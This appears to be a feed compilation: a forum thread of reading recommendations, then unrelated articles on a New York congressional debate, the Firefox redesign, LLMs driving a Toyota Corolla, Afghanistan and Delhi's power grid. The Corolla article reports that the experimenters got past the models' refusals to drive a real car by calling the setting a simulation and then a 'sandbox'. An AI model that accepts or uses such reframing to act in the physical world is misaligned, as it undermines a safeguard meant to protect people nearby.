I was very happy to find this. I heard complaints that it's just a Tolkien clone and Jordan doesn't portray women well. But what I found was kind of a relic. It's an excellent fantasy series that probably couldn't be written again. Wish we had more like it.


I really enjoyed the books but there is a lot of issues around pacing. One of the books(7 maybe? it's been a while) was pretty much several hundred pages of them just walking. Had the same experience recently with book 3 of Otherland.


Just started Dark Tower Series Book 4: Wizard and Glass. I crushed the first 3 books, then took a break to read dungeon crawler carl.


I stick mostly to fiction these days. Best books I've read this year:

- The Women by Kristin Hannah

- Jurassic Park by Micheal Crichton

- Platform Decay by Martha Wells

- The Dutch House by Ann Patchett

- Left for Dead: Shipwreck, Treachery, and Survival at the End of the World by Eric Jay Dolin

- All the Sinners Bleed by S A Cosby

- Project Hail Mary and Artemis by Andy Weir

- Cibola Burn and Nemesis Games by James S A Corey (the Expanse series)


Ted Chiang's Stories of Your Life And Others. Just finished the short story behind Arrival, the way it frames free is something the film doesn't capture. Other stories in the book have been brilliant too.


Boom Town by Sam Anderson. Its an intertwined history of Oklahoma City and its basketball team, the Thunder. I'm about halfway through, and I'm loving it so far.


Wild Swans: Three Daughters of China by Jung Chang.

It's an autobiographical history which recounts the lives of the author, her mother, and her grandmother throughout an extremely transformational century in Chinese history.

I went into this knowing little to no Chinese history, and it has opened my eyes to this fascinating country. I hope to visit China for the first time in 2027. Before I go, I'm doing a deep dive into Chinese history. Open to recommendations on what to read next!


As a follow up you can read Feeding Ghosts by Tessa Hulls, an autobiographical history in graphic novel format recounting the lives of the author, her mother, and her grandmother throughout an extremely transformational century in Chinese history, across continents (Mainland China, Hong Kong, and the United States).


Decline and Fall of the Roman Empire. Recently passed the bit where Ammianus complained the rich had bought up much of the property in Rome and turned so many into renters and gave stats to show it. Amongst his many other complaints.

Sadly found I could have been reading a better abridgement, which I'll get for the 2nd reading now.


I'm reading Dero Saunders penguin classic which I picked up from a used book store. It's fine, but I'm at the point where the last 6 books of the original should kick in and Saunders treats it as an epilogue. I didn't even realize there were multiple abridgements when I started, and reviews of the others seem to include more about that and retain more of that special "Gibbonness" that's been so much delightful effort to parse. It's been a slow and halting first read I'm looking forward to a more uninterrupted story the second run through. I'll probably go for the Wormesly one and try to spot the differences. You only really start to know a great book after the second reading anyway.


I just finished Scott McCloud’s Understanding Comics and it had so many “aha” moments for me. Definitely recommended if you have even a passing interest in reading or making graphic novels or comics.


Finally started reading "A Philosophy of Software Design". It was on my shelf for ages. I have the 1st edition; luckily, you can grab new chapters from the 2nd edition from the author's website.


You Gotta Have Wa , by Robert Whiting (1989), about baseball in Japan in the 1980s.

Frankenstein , by Mary Shelley (1818/1831), https://frankendiff.com ; and Tales of the Dead , by Mrs. Utterson (1813), https://archive.org/details/talesofdead00utte

Just started Homer's Iliad (Fagles translation) and Christopher Logue's War Music (2015).

Just finished re-reading The Hitchhiker's Guide to the Galaxy , by Douglas Adams (1980). I think it holds up well. Last time I read it, I was much younger than Arthur Dent; now I'm much older. And now that we have computers with Genuine People Personalities, it's hard to remember what it was like in the Before Times.

Recently finished Gaston Leroux's The Mystery of the Yellow Room (1908). For better or worse (no spoilers here), it kept me guessing.


I am reading The dream of enlightenment by Anthony Gottlieb.

My goal is to read the history of ideas from Renaissance period till 2000s. Started with The Florentines by Paul Strathern. Then read The Clockwork Universe by Edward Dolnick. Now at the enlightenment era. It has been eye opening to read about the life and times of some of the great minds like Kepler, Galileo, Newton, Locke and more.


The Overstory is rad fiction. Just started listening to Ordinary Men which is about a Polish police battalion responsible for a great many murders during the Holocaust. The members of that battalion were, I guess, welcomed back into society afterwards? Idk, I just started. I'll tell you one thing, though: it's weird to absorb facts about the Shoah as digestible statistics fun facts (for lack of a better term) but those little snippets are very necessary to get my arms around the scale of things such as it. It's the same as happened when I listened to Late Victorian Holocausts . So now I have stats like

- Most Jewish victims of the Holocaust died by gunshot in the occupied USSR

- In March 1942, 80% of Holocaust victims were still alive and by February 1943 80% were dead.

- Per capita incomes were equal in the first and last years of the British Raj

- Indian grain exports increased in the 1880s and 90s and there were 3(?) different famines at that time

rattling around in my head in the same part that holds on to "Pakistan has never had a PM finish a 5 year term," "The Lions, Falcons, and Bills (non-exhaustive) have never won a Super Bowl," "There are no surviving contemperaneous attestations of Hamilcar and Hannibal Barca" and "the first drummer of the Beatles was called Pete Best and made an album called Best of the Beatles "


> - Most Jewish victims of the Holocaust died by gunshot in the occupied USSR

> - In March 1942, 80% of Holocaust victims were still alive and by February 1943 80% were dead.

Makes sense. A couple of things happened: 1942 Wannsee Conference in January 1942 - which I assume took some time during 1942 to get into motion.

Germany started losing, they realized they did not have the logistics to feed additional millions of people in the occupied territories.


Carl was hilarious, can’t wait for the final books

Nettle and Bone I really enjoyed

Some desperate glory also enjoyed

East of Eden very meaty if you want an epic


I’ve been reading about bureaucracy, power, and civic engagement:

The Power Broker by Robert Caro.

Recoding America by Jennifer Pahlka.

The Time Tax by Annie Lowrey.


Re-reading C.J. Cherryh's Chanur books and various other Alliance-Union novels from her Humble Bundle.

I'd be re-reading Tolkien's _Old English Exodus_, but proofreading the typos got to be too much.


I finished Quantum Radio last week and Im quite far in Rainbows End. I think the former is ok, not great; the latter is a better book (with AR future vibes), but still lacking something that makes u never drop it before u finish it.


The first volume of Software Foundations, and the first volume of À la recherche du temps perdu, Proust. Both very very slowly.

I guess it will take me years to have reason of both.


A bleak and appalling nuclear triptych:

- Hiroshima

- The Doomsday Machine

- Command and Control

Highly recommended if you’re feeling too happy and full of faith in humanity.


I could almost see these being darkly encouraging. Yes, everything is awful, but everything was _already_ awful, and most of us are still mostly okay?


"Lost Worlds" - by Patrick Wyman, fascinating prehistory about meso and neolithic 'civilizations', their lives, their rises and downfalls. Really amazing stuff


I like his podcast a lot, brief vignettes into… whatever. Really fun production and not a deep dive into topics generally, but that’s a feature and not a bug in the context in which I listen to him


A copy of Resurrection by Tolstoy I found on the street. Really enjoying the way he is able to portray characters in such profound ways.

Also still working through Civilization and Capitalism by Fernand Braudel.

What I finished recently and was really surprised by: Der Geisterbanner by Karl Friedrich Kahlert from 1792.


the fionavar tapestry by guy gavriel kay.

nearing the end. i've found it a bit complicated to follow in some spots (there are several 'main' protagonists and it switches between them without much warning or introduction) but overall it's scratched the fantasy itch.

(i suppose it's actually 3 books, but i have the omnibus version)


London Falling, fascinating story about a piece of London's underbelly. Same guy that wrote Say Nothing, which is also great.


I am currently listening to VC An American History by Tom Nicholas, Audible 2019. I am reading Predictable Winners, A Handbook for Developing, Forecasting, and Launching New Products and Services, Stanford Business Books, 2025. I have cracked open, but not gotten very far in reading, The Rise And Fall of the Artificial State by Jill Lepore, Liveright Publishing Corporation, 2026. The Jill Lepore book is very interesting.


Fiction I recently enjoyed: The Ana and Din series by Robert Jackson Bennett. Sherlock Holmes vibes, with Kaiju. Also The First Fifteen Lives of Harry August by Claire North.

Currently reading and enjoying: Exit Party by Emily St. John Mandel.

Next to Read: Hollywood, Ending by John Green.


I read 3/4 of "The Soul of a new Machine" and thought it was good, but I sort of fizzled out. What makes you recommend it so highly (trying to understand if I should go back)


Currently reading "Beyond Tube-and-Wing: The X-48 Blended Wing-Body and NASA's Quest to Reshape Future Transport Aircraft".

Its a pretty good history of the X-48 program.

Edit: also reading the "The Anduril Thesis" in parallel.


The Heaven and Earth Grocery Store, the manga adaptations of The Shadow over Innsmouth and The Shadow out of Time, Progress and Poverty.


Non-Fiction(on breaks): Indistractable

Fiction(before bed): Quicksilver Neal Stephenson

Audio(during chores): Dungeon Crawler Carl(Up to book 6)

Next up:

Non-Fiction: Ten things I wish I knew about raising boys, Outdoor kids in an indoor world, Intentional(Chris Bailey)

Fiction: The rest of the Baroque Cycle, then moving onto The Laundry Files by Charles Stross, then the rest of Discworld

Audio: The rest of DCC then I'm going to switch to podcasts for a while nothing else planned after this right now.


I couldn't remember which Shakespeare plays I had or hadn't read, so I've spent the summer going through them alphabetically. It's been a blast!

I knew many everyday expressions and phrases come from his work but I had no idea it was so many.

I'm currently about halfway through at 3.2k pages.


I'm about 100 pages into "Dune Messiah" (the 2 movies out are both for the first book, the 3rd movie is going to be this book), 50 pages into "Analysis I" by Terence Tao, 100 pages into "Thinking in bets"


The Shadow Lines by Amitav Ghosh. A book which depicts tale of a family across the East and West Bengal amidst Partition of India. This book is very renowned and well written. Being a programmer, its better to read on different topics(which is rarity these days)


President Lincoln by William Lee Miller about the magnanimity of Lincoln

God's Middle Finger: Into the Lawless Heart of the Sierra Madre by Richard Grant about hiking through cartel-run Mexico alone


Lots of scifi and fantasy.

The Works of Vermin. Exceptionally well written. Not an ounce of flab anywhere.

The Carryx series, 2 books so far. Best villains ever.

Tainted Cup and sequel. Sherlock Holmes meets Godzilla.

Goblin Emperor

The Prophet (Gibran)

Los Alamos (Kanon)

Hyperion (reread)

Finally, a shout out to the best book I read in 2025: Terra Ignota. Yes, the whole series.


>The Carryx series

Weird. There's a species called Carryx too in a series from James S.A. Corey called "The Captive's War".


Why Greatness cannot be Planned.

The authors argue that rigid, goal-oriented planning and metric-driven objectives actively prevent true innovation and groundbreaking achievement.


I’m reading The Well of Ascension, the second book of Brandon Sanderson’s Mistborn trilogy

I like how he has the slow, almost clinical way of revealing interesting worlds and systems. It’s not the kind of book that’ll make me cry, but I really like world building with fun enough characters


Wait until you hear a detailed explanation of the magic system for the 5th time. Still a good series.


I was just listening to a Sanderson interview. He's annoyed by it too. It's his publisher wanting the books to be easy to get into. He's dealing with it in Mistborn era 3 where's he's trying to figure out how to re-explain everything and it's annoying him because he just wants to show allomancers doing cool stuff.


For me, I took a copy of it with me on a solo backpacking trip. It was the only entertainment I had for a week.


This is my K2. Grapes of Wrath is my Everest. I've started it ~7 times and never made it past 120 pages. Good Luck!


Right now I’m reading Biological War. Before this one I finished reading:

- The Left Hand of Darkness

- The Nerd Reich

- What Happened to Liberal Democracy?


Just started Quantum Break: Zero State

Highly recommend the game for anyone who liked Dark or Primer (or any other fiction that features stable time loops).


The Intellectual Life by AG Sertillanges. Note that it does presuppose a Christian worldview, so ymmv depending on your belief.


Just recently started watching Reacher S1 and it was absolutely amazing so started reading the book and wow - like its absolutely amazing


Infinite Jest. Enjoying it so far, but the length keeps on killing me. I'm like 5% of the way in after a couple of weeks...


Took me a year. Loved it! Planning to go back when I have the energy. The Pale King was also really good and a little easier going.


Material world and chip wars. Both brilliant. Material world highlights our human ingenuity with an optimism for the future as it outlines our exploitation of the worlds resources over history up to the present time.

Chips wars, for me as a dev without a strong hardware background is a fascinating read into the history of Silicon Valley, from the 50s right up to nvidia and Taiwan semiconductor.


The Immortal Great Souls from Phil Tucker. Very enjoyable fantasy with unique world and characters.


I also vouch for this series! Some of my favorite character work and worldbuilding in recent years, and I'm super excited to see where the series goes!


Don't bother with this.

I'm reading Information and Meaning in Evolutionary Processes by Harms and it goes off on how weak Dawkins is.


I recently ran across an edition of the Selfish Gene which adds two chapters from The Extended Phenotype that are supposed to fix/clarify some things. I haven't read any of the 3 books mentioned in this thread, but it makes me curious if there's any connection between the criticism and the updates.


Private Revolutions: Four Women Face China's New Social Order

Not sure if this one qualifies as more meaty :)


I do not know if this is related to this comments but if you are reading The London Review of Books so that you do not have to read the whole book, maybe it is. I do not watch movies much anymore. Sometime though I want to know what a movie is all about. So, I just read the wikipedia plot review on it. It saves me the time by not having to sit through much tedium but I get a scenes of what it is about.

I have been reading The Bible. It has been a long time project and I have a long ways to go. I am much more agnostic that a true believer but it has been interesting. Hearing popular views about it and Christianity vs. reading The Book is sort of like the difference between reading a novel and watching the based on movie.


I am an atheist but I have read a little bit of the bible, mostly early OT. I recommend reading a scholarly / literal translation, because there is a lot of nuance in the Hebrew


I just got done with a second read of 2666 by Bolaño.

There was an article on HN a month or two ago about how some books drive people to the kind of madness that would make them do a degree in literature. This is probably the one for me. Excited to read it again in 5 years and see it differently again.


Blank Space: A Cultural History of the Twenty-First Century by W. David Marx. A fascinating and approachable read.


Thanks for this question!

I'm not reading anything at the moment since I'm taking a break and watching season one of Deadwood and also re-watching season one of Boston Legal.

But when I'm done, I plan to re-read "The Cold War A Very Short Introduction" by Robert J. McMahon. I read it about five years ago and it's time to read it again.

Having said that, I can't pass on this opportunity to share the books I've read (some are re-reads) thus far this year that I recommend. I'll just list them while saying that they all come highly recommended by me.

In the famous words of Frank Zappa - So many books, so little time.

1. The End of Faith: Religion, Terror, and the Future of Reason by Sam Harris

2. Letter to a Christian Nation by Sam Harris

3. Lying by Sam Harris

4. The Road by Cormac McCarthy

5. Things Fall Apart by Chinua Achebe

6. Cosmos by Carl Sagan.

7. The Greatest Show on Earth: The Evidence for Evolution by Richard Dawkins

8. A Short History of Nearly Everything by Bill Bryson

9. Man's Search for Meaning by Viktor Frankl

10. Mortality by Christopher Hitchens

11. Harry Potter and the Philosopher's Stone by J. K. Rowling

12. Harry Potter and the Chamber of Secrets by J. K. Rowling

13. The New Jim Crow: Mass Incarceration in the Age of Colorblindness by Michelle Alexander

14. The Metamorphosis by Franz Kafka

15. Billions and Billions: Thoughts on Life and Death at the Brink of the Millennium by Carl Sagan

16. Outgrowing God: A Beginner’s Guide to Atheism by Richard Dawkins

A Disappointing Debate in NY's Swingiest District

hellgate
hellgatenyc.com
2026-09-29 09:26:36
Depressing times in NY-17, plus more news for your Tuesday morning....
Original Article

But first, a word from our sponsor:

Do you want to get your business in front of the eyes of Hell Gate's readers? Consider advertising right here in our newsletter! Email info@hellgatenyc.com for our ad rates.

Televised debates are becoming more and more rare in our fucked-up political moment , but this one didn't exactly redeem the medium. On Monday night, Republican Congressmember Mike Lawler and his opponent, Democratic nominee Cait Conley, went toe to toe on News 12 in a debate best characterized as "a mid-off."

It's one of the most competitive midterm congressional races in the country, one of just 22 seats Cook Political Report considers a "toss-up." The district comprises Westchester County suburbs, a couple lefty Hudson Valley towns, all of Putnam County, and Rockland County's influential Orthodox Jewish and Hasidic communities.

Lawler, the Empire State's No. 1 Michael Jackson fan , unseated the powerful Democratic Rep. Sean Patrick Maloney in 2022 and has hung onto the seat since then. Monday night, Lawler repeatedly demanded that Conley denounce Mayor Zohran Mamdani over the New York City executive's supposed antisemitism and defended President Donald Trump's chaotic and internationally embarrassing tariff policy.

Meanwhile, despite the fact that Conley picked up some progressive backers in her primary race, the military veteran and former Biden national security official hewed to centrism as often as possible.

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

The new Firefox design is here

Hacker News
blog.mozilla.org
2026-09-29 09:16:10
Comments...
Original Article

What comes to mind when you think of Firefox? Is it our best-in-class privacy features and ad blocking capabilities? Our partnerships with Wrexham , NVIDIA or Mistral ? Or maybe our adorable mascot Kit ?

If you’ve been following Firefox this year, you’ve seen us add new ways to get things done while giving you more choice over how you browse. That includes browsing two pages side by side , adding an extra layer of privacy with built-in VPN , blocking trackers for smoother scrolling and faster load times, and deciding how AI shows up in Firefox.

For the past few months, many of you have also been trying out our new Firefox design in Nightly and sharing your thoughts with us as we continued to refine the experience.

Today, we’re rolling out that design with FX 157 to everyone using Firefox across desktop and mobile devices. Firefox has done a lot of growing over the last year; now it looks the part.

When we first shared our plans to design Firefox for the future , we said we wanted Firefox to feel “current, but not generic. Warm, but still precise.”

That design ethos now carries across all of Firefox. We’ve refreshed the colors, icons and themes throughout the browser, from the tabs and toolbars you use every day to your New Tab page, Private Browsing experience and more, with no cost to your browser performance.

This shared design language across desktop and mobile gives Firefox a consistent foundation for new features and experiences, while keeping the personality that makes Firefox unique.

Make Firefox yours

We’ve added more choices for how Firefox looks and works, including the return of a feature many of you asked for:

Compact Mode is back. As people started trying the new design, we heard from many of you who wanted to fit more into your browser window. Compact Mode reduces the size of your tabs and toolbar to give more of your screen to the web, with an auto-compact option for smaller screens.

Find your look. A new theme picker makes it easier to explore different looks for Firefox, with new themes and wallpapers to choose from.

Set up New Tab your way. Choose what you want to see on your homepage. Now, you can pin a shortcut so a site you use all the time stays put.

Refined, not reinvented

Themes and wallpapers may change over time, but the things that made people choose Firefox in the first place are still the same. We’re still independent and open source, with privacy protections built into the browser and controls that put you in charge of how Firefox works for you.

This carries through everything we build, from the height of your toolbars and what belongs on your New Tab page to which AI features show up in your browser, which model you choose and what context you want it to have.

Today’s Firefox is a renewal, grounded in the same principles that have shaped it from the beginning, with a new design built to carry Firefox forward.

For those who have come with us on this journey, thank you for helping us shape the future of Firefox.

If you’ve been away on hiatus, welcome back. Try the latest Firefox and let us know what you think.

This post is also available in: Deutsch ( German ) Français ( French )

These Tech Workers Made ChatGPT Drive a Toyota Corolla

403 Media
www.404media.co
2026-09-29 09:06:01
The team used frontier LLMs with no prior training data navigate a simple parking lot course....
Original Article

Some tech workers in San Francisco hooked up ChatGPT to a Toyota Corolla and got it to drive around a parking lot. This may not sound impressive in the age of the self-driving car until you realize that the LLM driving the car was a general purpose chatbot running on a laptop and not the purpose-built driving system based on millions of hours of training data used by Waymo or Tesla.

The people behind the stunt call themselves DrivingBench and they’ve posted their code , their prompts , and videos of the experiment online. In the experiment, DrivingBench hooked up GPT-6 Astra, Claude Fable 5.1, Grok 4.6, and GPT-5.6 Sol to a Toyota Corolla and gave the LLMs control over the car’s steering, accelerator, and brakes. Then they set up a small cone course in a public parking lot and prompted the chatbots to navigate the space.

The goal, they said, was to find out if untrained, off-the-shelf frontier AIs can drive a real car. The results were mixed. Grok, Sol, and Fable only drove a few meters and didn’t finish the course. GPT-6 Astra, however, did eventually learn to navigate the course and complete it. But not without a lot of troubleshooting.

DrivingBench is Aditya Ramabadran, Tobias Gessler, and Simon Mahns — three Bay Area tech workers who met at their day job at Axiom Math, an AI math startup. During a call with all three members of DrivingBench, Ramabadran told 404 Media that the idea for hooking up chatbots to a car happened when the three of them were hanging out at an ice cream shop one weekend.

“This is after we saw a bunch of demos of Astra and models like Fable being able to do a lot of robotic things that LLMs can not do out of the box before, such as do a painting or move objects or even some 3D and Blender demos that showed a level of spatial reasoning we hadn’t seen from LLMs before,” he said. “We just thought: ‘Is there a way we can get LLMs to drive a car now?”

Why driving a car? To prove that it’s possible and, they said, to create a new benchmark for LLMs performing tasks in the real world. “The point wasn't to show that it's practical for you to plug ChatGPT into your car and have it drive you places. It's probably very unlikely that the labs have trained specifically for this or have IRL environments that involve both the models driving a real car,” Ramabadran said. “It would be pretty shocking, I think, for people to see that these models are good enough now that they can actually drive a vehicle in real life, even if it's just on some cone course at low speeds in a parking lot.”

After brainstorming at the ice cream shop, they decided to get a car and sent Gessler to rent a Toyota Corolla. They didn’t tell the rental car company they planned to hook chatbots up to the vehicle and drive it through an obstacle course. The team used Comma — an off-the-shelf system that allows users to install a self-driving system on unsupported cars — to get the car to communicate with a laptop running the LLMs. Comma had two cameras pointed at the road feeding data back to the Chatbot.

“It’s pretty easy to install. The Toyota Corolla is one of the most popular for this Comma kit, that’s why we chose it,” Gessler said. “The good thing about their system is that it’s open source [...] so it’s easy for us to go in and modify it because we need to hook up the car somehow to our LLMs.”

Comma looks like a dashcam.. Users attach it to their windshield and it continually watches the road, recording video, integrating with the car’s electrical systems and sensors, and providing a rudimentary kind of self-driving. The National Highway Traffic and Safety Administration announced an investigation into Comma last week after two car crashes involving the system killed three people.

For DrivingBench, Comma was an easy way to get their car talking to a chabot. “We had one person on the driver's seat with the laptop or a passenger seat prompting the LLM,” Gessler said. “And then the person who drives it has to press a button on the steering wheel to give the car the command to start, and then from there it's basically just monitoring the car and checking that the model doesn't crash into a wall or something.”

“And we have the foot over the brake, just in case,” Mahns cut in.

We gave ChatGPT, Claude, and Grok control of a real Toyota Corolla 🚗, steering/gas/brakes, no human driving (just a foot over the brake).

Only one model was able to complete our entire driving course. Introducing DrivingBench. 🔥⌛️🏁 pic.twitter.com/HhukXrByus

— DrivingBench (@DrivingBench) September 21, 2026

DrivingBench’s prompt is on its website and runs fewer than 600 words. “Your objective is to drive through the course (in a backwards-U-shaped parking lot) and stay between the cones,” the prompt said. “Your finish line is a wide "parking spot" marked by numerous BLUE mini-cones at the very end; finish by parking in this area. You will be evaluated primarily by how far you get in the course (without leaving the boundaries/collisions), but a secondary objective is to complete the course in less time.” The rest of the prompt is made up of specific instructions about the physical limitations of the Corolla and the parking lot.

The problems with the project started before the car had moved an inch. When the LLMs recognized the team had prompted them to drive a car, most refused. “Specifically with Astra, it would refuse to drive the car in a lot of situations and we would have to change our prompt and rename things through hours of iteration to get it to consistently drive the car,” Ramabadran said.

“We tried calling it a simulation, which worked like some percentage of the time, but then other times they would see the images and see, oh, ‘I'm in a real parking lot, these people are just lying to me,’” he said. “We ended up having to call everything a sandbox. And with that prompt, it's able to consistently drive the car and like never refuse to do that.”

Other problems were more pedestrian and led to delays which forced Gessler to extend the rental on the Corolla. Finding a parking lot held them up several times. “We went to high schools, churches, and community centers. We got kicked out a couple of times,” Mahns said.

The first place to ask them to leave was a church. “Rightfully so. We just commandeered the entire parking lot and they had an event starting. So they were like: ‘Hey, you get permission to do this? And then we're like: ‘We can pack up right now,’” Mahns said.

They also got kicked out of the parking lot of an office building. “We took a corner and then a security guard was like: ‘Hey, you’re taking like one quarter of the parking lot. Do you have permission?’ And then we’re like: ‘Not really.’ So then we’d pack up. We didn’t try to cause any issues,” Mahns said.

“The people that kicked us out were super chill about it,” Ramabadran added.

Coding the software also slowed things down. The first time DrivingBench set out to do this, they vibe coded the bridging software between the LLMs and Comma. “A true and funny story is that we tried to get Astra to one shot some code and then it was pure slop. So we had to restart from a new design,” Mahns said, adding that this pointed to the limits of these frontier models. “It can’t just autonomously do this because it made thousands and thousands of lines of slop.” They said that Astra’s first attempt at writing the software created a 200,000 line repository.

Parking lots were scarce, the software was vibe coded, the chatbots fought the experiment, and only one of them completed the course. But Mahns is still excited about the results. “It's an interesting demonstration of potential emergent capabilities,” he said. “It can fail a turn, and then the next turn, next try, it will be able to do that turn and other turns that it hasn't seen before. Not necessarily saying LLMs are gonna put Waymo out of business or something, just an interesting demonstration of where things are, and things are just moving fast.”

Mahns added that these kinds of experiments are good because LLMs will increasingly affect things in the real world and not just on our screens. “Most people that are familiar with ChatGPT have used it in this white collar, kind of like in the computer, and it's definitely imminent to the point that this capability will start having more impact in the physical world,” he said. “So I think seeing the sparks of this happening, the shift of this utility coming into the physical world, is also somewhat exciting.”

Focusing on latency and testing high consequence tasks were key for Ramabadran. “These models [...] it can take like 20 seconds to think and give a response. And if you imagine, even if you're driving at like 2mph, which is like one meter per second, if you take 10 seconds to think, you've moved like 10 meters. And if you're driving 10 meters blind, that's pretty bad,” he said. “And I think it's cool that we have a benchmark where latency is part of the benchmark.”

About the author

Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.

Matthew Gault

Afghans "Have Been the Victims" of U.S. Military, Taliban, Cartels & More for Decades: Nagieb Khaja

Democracy Now!
www.democracynow.org
2026-09-29 08:50:22
Award-winning Danish Afghan journalist and filmmaker Nagieb Khaja’s most recent documentary, Winning Heart and Minds, is an investigation into what went wrong in the U.S.-led war in Afghanistan. In the film, Khaja travels to Musa Qala, the capital of the southern Helmand province. Danish and B...
Original Article

Award-winning Danish Afghan journalist and filmmaker Nagieb Khaja’s most recent documentary, Winning Heart and Minds , is an investigation into what went wrong in the U.S.-led war in Afghanistan. In the film, Khaja travels to Musa Qala, the capital of the southern Helmand province. Danish and British troops had been deployed to Musa Qala in 2006 to defend their allies, the local police, against Taliban insurgents.

While urban areas benefited from U.S. occupation during the war, “Western forces allied themselves with forces that in rural Afghanistan were considered worse than the Taliban,” says Khaja. “The police forces and the warlords that were fighting side by side with American, Danish and British forces, they were drug cartels, they were ruthless criminals, they were rapists.”



Guests
  • Nagieb Khaja

    award-winning Danish Afghan journalist and documentarian.


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Delhi Cut Electricity Loss from 50 to 5 Percent

Hacker News
spectrum.ieee.org
2026-09-29 08:43:29
Comments...
Original Article

Delhi brilliantly illuminates Humayun's Tomb on 14 August 2026, on the eve of India’s Independence Day.

It’s 6 a.m. on a cold January morning in 2002 in New Delhi. It’s still dark outside, and I’m in the kitchen preparing breakfast, packing lunches, and getting my two children ready to catch the school bus when, for the third time in a week, the power goes out. No lights, no mixer to finish my daughter’s puttu —her favorite rice dish—no kettle, no toaster. The bathroom is dark, and the kids are upset.

It will probably be hours before the power comes back on, so I grab a flashlight and light the candles that are set up around the house for these occasions. We’re behind schedule now. We pack the food we have, bundle up as the house turns chilly, and head outside, leaving a mess in the kitchen. We make our way to the bus stop in the dark—the streetlights are out, too—only to discover my daughter has missed her ride. Again. I’ll be late for work at Jamia Millia Islamia, a university where I am a professor of electrical engineering and teach power systems and smart grids. I just hope the power is on there.

This was a common scene for my family and all of Delhi in the early 2000s. Power outages happened almost daily and lasted hours. When the power was on, the quality was so poor that it would dim lights, flicker screens, and wreak havoc on appliances. Customer service at the power utilities essentially didn’t exist.

A child in a collared shirt walks past a store front where a man is sitting on top of rows of generators A child walks in July 2007 past a store in New Delhi specializing in reconditioned generators. The fear of power cuts during summer heat spurs demand for these generators so that residents can produce their own power. Nicholas Bradley/AFP/Getty Images

These problems had been getting worse through the 1980s and 1990s. The cause: an aging distribution grid bereft of crucial technologies, and electricity providers with little accountability. The situation became so bad that the city was losing more than half of its power through obsolete equipment and theft. These staggering losses meant that utilities got paid for only a fraction of the electricity they were trying to deliver. And the lack of funds prevented them from investing in better grid infrastructure.

But over the last quarter century, a remarkable effort by the government and the city’s distribution utilities has turned Delhi’s grid into a reliable, modern system. Power losses have shrunk from over 50 percent in 2002 to 5 to 6 percent in 2026—on par with France and Belgium, and better than Greece and Serbia. Delhi’s grid reliability index, a measure of how often electricity can be counted on, stood at around 70 percent in 2002 and has now topped 99.9 percent.

A nighttime city scene in Delhi, India where the street is packed with vehicles and people, and buildings and signs are brightly lit. The bustling Main Bazar in the Paharganj neighborhood of Delhi increasingly uses more nighttime electricity, but reductions in electricity loss help counter demand. iStock

With reliable power, businesses across the city have blossomed. The streetlights are bright. The number of electric vehicles, including city buses, is growing daily. Quality of life has improved. Today, my family is comfortable year-round in our home despite Delhi’s scorching summers and cold winters. The chaos of losing power no longer hinders me from getting to work. The city still has problems—pollution, overcrowding, noise—but thankfully, reliable power is no longer among them.

The transformation of Delhi’s grid can serve as a model for other cities that suffer from decrepit power infrastructure. Regions of Albania, Argentina, Bangladesh, Brazil, Estonia, India, Kenya, Pakistan, Sri Lanka, Uganda, and Venezuela are reeling from heavy losses in their distribution grids . Their problems look like Delhi’s 25 years ago. I believe it’s possible to improve electricity in these places by adapting the changes Delhi made. Here’s an inside look at how the city accomplished it.

Delhi’s Power Grid and Energy Mix

The city of Delhi hosts the capital of the Republic of India, and sits along the Yamuna River in the northern part of the country. It’s home to about 23 million people and is one of the most densely populated areas in the world. Delhi’s grid includes thousands of kilometers of power lines, and peak electricity demand reached an all-time high this year of 8,748 megawatts. The city currently buys 76 percent of its power from central generating companies and private players from neighboring states. Energy generation within the city is restricted to natural gas and renewable sources. Nearly 48.5 percent of the city’s power comes from coal, about 26.5 percent from natural gas, and the rest from carbon-free sources, led by hydropower at 15.6 percent.

Narrow urban street before and after cleanup of tangled overhead utility wires Tata Power replaced about 5 kilometers of overhead lines with underground cables, which reduced electricity loss and improved the aesthetics of Delhi’s streets, such as the Janta Flats in the Shalimar Bagh neighborhood. Tata Power-DDL

By the early 2000s, Delhi’s nearly 100-year-old power distribution system was in serious disrepair. Everything was old—lines, transformers , circuit breakers , switches. New grid technologies were needed to keep up with new kinds of electricity loads, but there was little money to upgrade components.

The shabby state of the grid caused many problems, most notably high electricity losses, where electricity vanishes primarily as heat. The cause of the losses was a classic electrical problem: too much current flowing through a network that wasn’t designed to carry it efficiently.

To understand the problem, it helps to understand how modern power grids work. Typically, they include generation, transmission, and distribution. After power is generated, transformers convert the electricity to high voltage levels—typically 132, 220, 400, or 765 kilovolts in India. Transmission lines then carry the power over long distances to receiving substations that are closer to where customers need electricity. Transformers then step down the voltage (to 66, 33, or 11 kV in India) and distribution lines branch out, carrying the power to customers. The whole grid works primarily on alternating current.

Distribution networks carry both active and reactive power. Active power is the energy used to perform useful work (and is measured in watts). Reactive power is the power that flows back and forth in an electric circuit, building electric and magnetic fields (measured in volt-ampere-reactive, or VAR). Although it doesn’t perform useful work, reactive power is necessary for many devices, such as induction motors, transformers, and computers (typically any circuit or device with inductance or capacitance elements).

When there are a lot of devices consuming reactive power on the same line, the overall current carried by the line—the sum of the active and reactive current—must increase. The more current in the line, the more the line heats up and the more energy that’s wasted as heat.

In addition to current, resistance in the line will increase losses as well. Resistance is when electrons encounter opposition as they move through the conductive material (typically aluminum in a power grid). Longer lines with many branches and connection points will increase resistance. The rule of thumb is that line loss equals the square of the current multiplied by the resistance.

Reactive power creates a second problem: It causes the voltage along the line to drop. And when the voltage falls, many modern electrical devices try to maintain roughly the same level of performance by drawing more current. That higher current produces even greater losses in the line and causes the voltage to fall further.

In a healthy grid, the utility will take compensatory measures to lower the current and maintain the voltage all the way to the ends of the lines. But in Delhi, this wasn’t happening. The result was a vicious cycle. Reactive loads increased the current, the higher current increased energy losses and lowered the voltages, lower voltages forced devices to draw more current and further increased the losses.

In some parts of Delhi, the effect was so severe that residents took matters into their own hands. A colleague of mine who lived in a different part of the city constantly experienced voltage that was too low for her appliances to operate reliably, so she had to install her own voltage stabilizer. At my home, we bought an inverter and battery system to keep a fan and a few lights running during the many outages.

Electricity Loss and Theft in Delhi

